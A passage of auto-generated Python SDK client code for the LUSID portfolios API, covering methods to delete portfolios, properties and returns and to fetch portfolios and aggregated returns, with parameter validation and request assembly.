    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(DeletedEntityResponse, status_code(int), headers(HTTPHeaderDict))
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw kwargs dict, which is folded in below.
    local_var_params = locals()

    all_params = [
        'scope',
        'code'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments, then merge the known ones into the
    # parameter map.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_portfolio" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation of `scope` and `code`: 1-64 chars, restricted
    # character set.
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
            len(local_var_params['scope']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
            len(local_var_params['scope']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        # Raw string: `\-` in a plain literal is an invalid escape sequence
        # (SyntaxWarning on modern Python); the message text is unchanged.
        raise ApiValueError(r"Invalid value for parameter `scope` when calling `delete_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
            len(local_var_params['code']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
            len(local_var_params['code']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `code` when calling `delete_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # Assemble request pieces: path substitutions, (empty) query string,
    # headers, and (empty) body.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501

    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    response_types_map = {
        200: "DeletedEntityResponse",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def delete_portfolio_properties(self, scope, code, property_keys, **kwargs):  # noqa: E501
    """DeletePortfolioProperties: Delete portfolio properties  # noqa: E501

    Delete one or more properties from a particular portfolio. Time-variant
    properties require an effective datetime from which to delete; perpetual
    properties must not be given one.  # noqa: E501

    Synchronous by default; pass async_req=True to obtain a request thread
    whose .get() yields the result.

    >>> thread = api.delete_portfolio_properties(scope, code, property_keys, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param property_keys: The property keys of the properties to delete. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'. Each property must be from the 'Portfolio' domain. (required)
    :type property_keys: list[str]
    :param effective_at: The effective datetime or cut label at which to delete time-variant properties from. The property must exist at the specified 'effectiveAt' datetime. Do not specify this parameter if any of the properties to delete are perpetual.
    :type effective_at: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. Either a
                             single total-timeout number or a
                             (connection, read) tuple.
    :return: DeletedEntityResponse, or the request thread when async_req=True.
    :rtype: DeletedEntityResponse
    """
    # Delegate to the *_with_http_info variant, forcing body-only return.
    return self.delete_portfolio_properties_with_http_info(
        scope, code, property_keys,
        **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def delete_portfolio_properties_with_http_info(self, scope, code, property_keys, **kwargs):  # noqa: E501
    """DeletePortfolioProperties: Delete portfolio properties  # noqa: E501

    Delete one or more properties from a particular portfolio. If the properties are time-variant then an effective datetime from which to delete properties must be specified. If the properties are perpetual then it is invalid to specify an effective datetime for deletion.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.delete_portfolio_properties_with_http_info(scope, code, property_keys, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param property_keys: The property keys of the properties to delete. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'. Each property must be from the 'Portfolio' domain. (required)
    :type property_keys: list[str]
    :param effective_at: The effective datetime or cut label at which to delete time-variant properties from. The property must exist at the specified 'effectiveAt' datetime. If the 'effectiveAt' is not provided or is before the time-variant property exists then a failure is returned. Do not specify this parameter if any of the properties to delete are perpetual.
    :type effective_at: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(DeletedEntityResponse, status_code(int), headers(HTTPHeaderDict))
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw kwargs dict, which is folded in below.
    local_var_params = locals()

    all_params = [
        'scope',
        'code',
        'property_keys',
        'effective_at'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments, then merge the known ones into the
    # parameter map.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_portfolio_properties" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'property_keys' is set
    if self.api_client.client_side_validation and ('property_keys' not in local_var_params or  # noqa: E501
            local_var_params['property_keys'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `property_keys` when calling `delete_portfolio_properties`")  # noqa: E501

    # Client-side validation of `scope` and `code`: 1-64 chars, restricted
    # character set.
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
            len(local_var_params['scope']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
            len(local_var_params['scope']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `delete_portfolio_properties`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        # Raw string: `\-` in a plain literal is an invalid escape sequence
        # (SyntaxWarning on modern Python); the message text is unchanged.
        raise ApiValueError(r"Invalid value for parameter `scope` when calling `delete_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
            len(local_var_params['code']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
            len(local_var_params['code']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `delete_portfolio_properties`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `code` when calling `delete_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # Assemble request pieces: path substitutions, query string, headers,
    # and (empty) body.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []
    if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None:  # noqa: E501
        query_params.append(('effectiveAt', local_var_params['effective_at']))  # noqa: E501
    if 'property_keys' in local_var_params and local_var_params['property_keys'] is not None:  # noqa: E501
        query_params.append(('propertyKeys', local_var_params['property_keys']))  # noqa: E501
        # Each property key becomes its own repeated query parameter.
        collection_formats['propertyKeys'] = 'multi'  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501

    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    response_types_map = {
        200: "DeletedEntityResponse",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}/properties', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def delete_portfolio_returns(self, scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs):  # noqa: E501
    """[EARLY ACCESS] DeletePortfolioReturns: Delete Returns  # noqa: E501

    Cancel one or more Returns which exist into the specified portfolio.  # noqa: E501

    Synchronous by default; pass async_req=True to obtain a request thread
    whose .get() yields the result.

    >>> thread = api.delete_portfolio_returns(scope, code, return_scope, return_code, from_effective_at, to_effective_at, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the Portfolio. (required)
    :type scope: str
    :param code: The code of the Portfolio. (required)
    :type code: str
    :param return_scope: The scope of the Returns. (required)
    :type return_scope: str
    :param return_code: The code of the Returns. (required)
    :type return_code: str
    :param from_effective_at: The start date from which to delete the Returns. (required)
    :type from_effective_at: str
    :param to_effective_at: The end date from which to delete the Returns. (required)
    :type to_effective_at: str
    :param period: The Period (Daily or Monthly) of the Returns to be deleted. Defaults to Daily.
    :type period: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. Either a
                             single total-timeout number or a
                             (connection, read) tuple.
    :return: DeletedEntityResponse, or the request thread when async_req=True.
    :rtype: DeletedEntityResponse
    """
    # Delegate to the *_with_http_info variant, forcing body-only return.
    return self.delete_portfolio_returns_with_http_info(
        scope, code, return_scope, return_code, from_effective_at,
        to_effective_at, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def delete_portfolio_returns_with_http_info(self, scope, code, return_scope, return_code, from_effective_at, to_effective_at, **kwargs):  # noqa: E501
    """[EARLY ACCESS] DeletePortfolioReturns: Delete Returns  # noqa: E501
    Cancel one or more Returns which exist into the specified portfolio.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.delete_portfolio_returns_with_http_info(scope, code, return_scope, return_code, from_effective_at, to_effective_at, async_req=True)
    >>> result = thread.get()
    :param scope: The scope of the Portfolio. (required)
    :type scope: str
    :param code: The code of the Portfolio. (required)
    :type code: str
    :param return_scope: The scope of the Returns. (required)
    :type return_scope: str
    :param return_code: The code of the Returns. (required)
    :type return_code: str
    :param from_effective_at: The start date from which to delete the Returns. (required)
    :type from_effective_at: str
    :param to_effective_at: The end date from which to delete the Returns. (required)
    :type to_effective_at: str
    :param period: The Period (Daily or Monthly) of the Returns to be deleted. Defaults to Daily.
    :type period: str
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(DeletedEntityResponse, status_code(int), headers(HTTPHeaderDict))
    """
    # locals() is captured as the very first statement so it contains
    # exactly the declared parameters plus the raw kwargs dict.
    local_var_params = locals()
    all_params = [
        'scope',
        'code',
        'return_scope',
        'return_code',
        'from_effective_at',
        'to_effective_at',
        'period'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )
    # Reject unknown keyword arguments, then merge the known ones into the
    # parameter map.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_portfolio_returns" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']
    # verify the required parameter 'from_effective_at' is set
    if self.api_client.client_side_validation and ('from_effective_at' not in local_var_params or  # noqa: E501
            local_var_params['from_effective_at'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `from_effective_at` when calling `delete_portfolio_returns`")  # noqa: E501
    # verify the required parameter 'to_effective_at' is set
    if self.api_client.client_side_validation and ('to_effective_at' not in local_var_params or  # noqa: E501
            local_var_params['to_effective_at'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `to_effective_at` when calling `delete_portfolio_returns`")  # noqa: E501
    # NOTE(review): unlike the sibling methods, no length/pattern validation
    # is generated here for scope/code/return_scope/return_code.
    collection_formats = {}
    # Path substitutions use the camelCase names expected by the URL template.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501
    if 'return_scope' in local_var_params:
        path_params['returnScope'] = local_var_params['return_scope']  # noqa: E501
    if 'return_code' in local_var_params:
        path_params['returnCode'] = local_var_params['return_code']  # noqa: E501
    # Query parameters are only sent when explicitly provided (non-None).
    query_params = []
    if 'from_effective_at' in local_var_params and local_var_params['from_effective_at'] is not None:  # noqa: E501
        query_params.append(('fromEffectiveAt', local_var_params['from_effective_at']))  # noqa: E501
    if 'to_effective_at' in local_var_params and local_var_params['to_effective_at'] is not None:  # noqa: E501
        query_params.append(('toEffectiveAt', local_var_params['to_effective_at']))  # noqa: E501
    if 'period' in local_var_params and local_var_params['period'] is not None:  # noqa: E501
        query_params.append(('period', local_var_params['period']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501
    header_params['Accept-Encoding'] = "gzip, deflate, br"
    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501
    # Map of HTTP status code -> model class name used for deserialization.
    response_types_map = {
        200: "DeletedEntityResponse",
        400: "LusidValidationProblemDetails",
    }
    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}/returns/{returnScope}/{returnCode}/$delete', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def get_portfolio(self, scope, code, **kwargs):  # noqa: E501
    """GetPortfolio: Get portfolio  # noqa: E501

    Retrieve the definition of a particular portfolio.  # noqa: E501

    Synchronous by default; pass async_req=True to obtain a request thread
    whose .get() yields the result.

    >>> thread = api.get_portfolio(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param effective_at: The effective datetime or cut label at which to retrieve the portfolio definition. Defaults to the current LUSID system datetime if not specified.
    :type effective_at: str
    :param as_at: The asAt datetime at which to retrieve the portfolio definition. Defaults to returning the latest version of the portfolio definition if not specified.
    :type as_at: datetime
    :param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto the portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
    :type property_keys: list[str]
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. Either a
                             single total-timeout number or a
                             (connection, read) tuple.
    :return: Portfolio, or the request thread when async_req=True.
    :rtype: Portfolio
    """
    # Delegate to the *_with_http_info variant, forcing body-only return.
    return self.get_portfolio_with_http_info(
        scope, code, **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def get_portfolio_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """GetPortfolio: Get portfolio  # noqa: E501

    Retrieve the definition of a particular portfolio.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_portfolio_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param effective_at: The effective datetime or cut label at which to retrieve the portfolio definition. Defaults to the current LUSID system datetime if not specified.
    :type effective_at: str
    :param as_at: The asAt datetime at which to retrieve the portfolio definition. Defaults to returning the latest version of the portfolio definition if not specified.
    :type as_at: datetime
    :param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto the portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
    :type property_keys: list[str]
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(Portfolio, status_code(int), headers(HTTPHeaderDict))
    """
    # locals() is captured first so it holds exactly the declared
    # parameters plus the raw kwargs dict, which is folded in below.
    local_var_params = locals()

    all_params = [
        'scope',
        'code',
        'effective_at',
        'as_at',
        'property_keys'
    ]
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments, then merge the known ones into the
    # parameter map.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_portfolio" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation of `scope` and `code`: 1-64 chars, restricted
    # character set.
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
            len(local_var_params['scope']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
            len(local_var_params['scope']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        # Raw string: `\-` in a plain literal is an invalid escape sequence
        # (SyntaxWarning on modern Python); the message text is unchanged.
        raise ApiValueError(r"Invalid value for parameter `scope` when calling `get_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
            len(local_var_params['code']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
            len(local_var_params['code']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError(r"Invalid value for parameter `code` when calling `get_portfolio`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # Assemble request pieces: path substitutions, query string, headers,
    # and (empty) body.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []
    if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None:  # noqa: E501
        query_params.append(('effectiveAt', local_var_params['effective_at']))  # noqa: E501
    if 'as_at' in local_var_params and local_var_params['as_at'] is not None:  # noqa: E501
        query_params.append(('asAt', local_var_params['as_at']))  # noqa: E501
    if 'property_keys' in local_var_params and local_var_params['property_keys'] is not None:  # noqa: E501
        query_params.append(('propertyKeys', local_var_params['property_keys']))  # noqa: E501
        # Each property key becomes its own repeated query parameter.
        collection_formats['propertyKeys'] = 'multi'  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501

    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    response_types_map = {
        200: "Portfolio",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def get_portfolio_aggregated_returns(self, scope, code, return_scope, return_code, aggregated_returns_request, **kwargs):  # noqa: E501
    """[EARLY ACCESS] GetPortfolioAggregatedReturns: Aggregated Returns  # noqa: E501

    Aggregate Returns which are on the specified portfolio.  # noqa: E501

    Synchronous by default; pass async_req=True to obtain a request thread
    whose .get() yields the result.

    >>> thread = api.get_portfolio_aggregated_returns(scope, code, return_scope, return_code, aggregated_returns_request, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the Portfolio. (required)
    :type scope: str
    :param code: The code of the Portfolio. (required)
    :type code: str
    :param return_scope: The scope of the Returns. (required)
    :type return_scope: str
    :param return_code: The code of the Returns. (required)
    :type return_code: str
    :param aggregated_returns_request: The request used in the AggregatedReturns. (required)
    :type aggregated_returns_request: AggregatedReturnsRequest
    :param from_effective_at: The start date from which to calculate the Returns.
    :type from_effective_at: str
    :param to_effective_at: The end date for which to calculate the Returns.
    :type to_effective_at: str
    :param as_at: The asAt datetime at which to retrieve the Returns. Defaults to the latest.
    :type as_at: datetime
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. Either a
                             single total-timeout number or a
                             (connection, read) tuple.
    :return: ResourceListOfAggregatedReturn, or the request thread when async_req=True.
    :rtype: ResourceListOfAggregatedReturn
    """
    # Delegate to the *_with_http_info variant, forcing body-only return.
    return self.get_portfolio_aggregated_returns_with_http_info(
        scope, code, return_scope, return_code, aggregated_returns_request,
        **dict(kwargs, _return_http_data_only=True))  # noqa: E501
def get_portfolio_aggregated_returns_with_http_info(self, scope, code, return_scope, return_code, aggregated_returns_request, **kwargs):  # noqa: E501
    """[EARLY ACCESS] GetPortfolioAggregatedReturns: Aggregated Returns  # noqa: E501

    Aggregate Returns which are on the specified portfolio.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_portfolio_aggregated_returns_with_http_info(scope, code, return_scope, return_code, aggregated_returns_request, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the Portfolio. (required)
    :type scope: str
    :param code: The code of the Portfolio. (required)
    :type code: str
    :param return_scope: The scope of the Returns. (required)
    :type return_scope: str
    :param return_code: The code of the Returns. (required)
    :type return_code: str
    :param aggregated_returns_request: The request used in the AggregatedReturns. (required)
    :type aggregated_returns_request: AggregatedReturnsRequest
    :param from_effective_at: The start date from which to calculate the Returns.
    :type from_effective_at: str
    :param to_effective_at: The end date for which to calculate the Returns.
    :type to_effective_at: str
    :param as_at: The asAt datetime at which to retrieve the Returns. Defaults to the latest.
    :type as_at: datetime
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(ResourceListOfAggregatedReturn, status_code(int), headers(HTTPHeaderDict))
    """
    # Must be the first statement: snapshot every declared parameter
    # (including 'self' and the raw 'kwargs' dict) by name; the rest of
    # the method indexes this mapping with parameter-name strings.
    local_var_params = locals()

    # Parameters this endpoint accepts, in API order.
    all_params = [
        'scope',
        'code',
        'return_scope',
        'return_code',
        'aggregated_returns_request',
        'from_effective_at',
        'to_effective_at',
        'as_at'
    ]
    # Transport-level options accepted by every generated endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_portfolio_aggregated_returns" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'aggregated_returns_request' is set
    # NOTE(review): only the body parameter is None-checked here; the path
